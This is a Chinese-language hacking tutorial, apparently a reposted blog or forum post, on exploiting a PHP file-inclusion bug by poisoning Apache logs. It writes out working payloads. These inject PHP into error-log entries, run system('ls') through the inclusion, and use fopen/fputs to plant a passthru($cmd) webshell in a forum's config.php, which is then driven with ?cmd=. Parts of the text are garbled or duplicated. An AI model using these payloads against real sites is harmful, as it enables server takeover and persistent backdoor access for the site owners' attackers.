有关php包含Apache日志
利用,其实也就是利用提交地址被Apache服务器日志记录
在日志里提交相应php语句从而包含了去执行
当 然这种办法最大弊端是Apache日志肯定会过大回应时候当然会超时什么所以也是受条件限制全当
种研究算了比如说
在个php存在包含漏洞就像这样,存在句php包含漏洞语句<?
($zizzy); ?>你可以
而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是
样样可以读出来只不过文件会很大那也没意思测试下去了那如何利用呢比如我们提交
http://www.xxx.com/<?phpinfo
;?>这样肯定会出错
而出错就被记在日志里了http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
这样这个日志文件就被包含成了phpinfo
信息可以
话这样子也不错<?system("ls+-la+/home");?>发散思维:
下面想
再深入点就是我在想如何写入个webshell来利用当然前提是权限必须可写
定要-rwxrwxrwx(777)才能继续这里直接用上面列出目录来查看比如这句php语句
<?=str_replace("?","!",passthru($cmd));?>
到这里你也许就想到了
这是个很不错办法接着看,如何写入就成了个问题用这句fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件
然后写入<?=str_replace("?","!",passthru($cmd));?>这个执行命令语句连起来就是<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?=str_replace("?","!",passthru($cmd));?>");fclose($fp);?>
我们提交这句
再让Apache记录到日志里");fclose($fp'>http://xxx.com/z.php?zizzy=<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?=str_replace(\"?\",\"!\",passthru(\$cmd));?>");fclose($fp);?>
语句里加了些斜杆也是为了magic_quotes_gpc考虑
这样就在config.php里写入了个php木马语句再来提交
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
这样webshell就写入成功了
OK.
http://www.xxx.com/forum/config.php这个就成了我们
webshell你可以http://www.xxx.com/forum/config.php?cmd=ls来使用了
最新评论